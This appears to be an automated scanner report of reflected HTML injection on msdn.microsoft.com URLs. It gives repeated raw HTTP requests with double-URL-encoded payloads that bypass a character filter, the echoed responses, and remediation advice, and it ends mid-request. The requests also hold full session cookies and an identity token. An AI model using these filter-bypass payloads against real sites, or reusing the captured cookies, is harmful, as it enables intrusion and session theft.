This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library653a0%2522%253e%253ca%253eb3def3ef286/dd208104(PROT.10).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9217
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:37 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library653a0"><a>b3def3ef286/dd208104(PROT.10)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32d6f%2522%253e%253ca%253e13799d99661 was submitted in the REST URL parameter 3. This input was echoed as 32d6f"><a>13799d99661 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd208104(PROT.10).aspx32d6f%2522%253e%253ca%253e13799d99661 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9227 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:50 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd208104(PROT.10).aspx32d6f"><a>13799d99661" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e81ea%2522%253e%253ca%253e6a2a9f3482d was submitted in the REST URL parameter 1. This input was echoed as e81ea"><a>6a2a9f3482d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-use81ea%2522%253e%253ca%253e6a2a9f3482d/library/dd582937(office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:57 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-use81ea"><a>6a2a9f3482d/library/dd582937(office.11" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74342%2522%253e%253ca%253eb95c098f3cf was submitted in the REST URL parameter 2. This input was echoed as 74342"><a>b95c098f3cf in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library74342%2522%253e%253ca%253eb95c098f3cf/dd582937(office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:10 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library74342"><a>b95c098f3cf/dd582937(office.11" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1cf4%2522%253e%253ca%253ea00ac7dd75a was submitted in the REST URL parameter 3. This input was echoed as f1cf4"><a>a00ac7dd75a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582937(office.11f1cf4%2522%253e%253ca%253ea00ac7dd75a HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:25 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582937(office.11f1cf4"><a>a00ac7dd75a" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46aa7%2522%253e%253ca%253e2b28de78233 was submitted in the REST URL parameter 1. This input was echoed as 46aa7"><a>2b28de78233 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us46aa7%2522%253e%253ca%253e2b28de78233/library/dd582937(office.11).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9221 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:14 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us46aa7"><a>2b28de78233/library/dd582937(office.11)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ad5e%2522%253e%253ca%253e9e2edfb91df was submitted in the REST URL parameter 2. This input was echoed as 9ad5e"><a>9e2edfb91df in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library9ad5e%2522%253e%253ca%253e9e2edfb91df/dd582937(office.11).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; 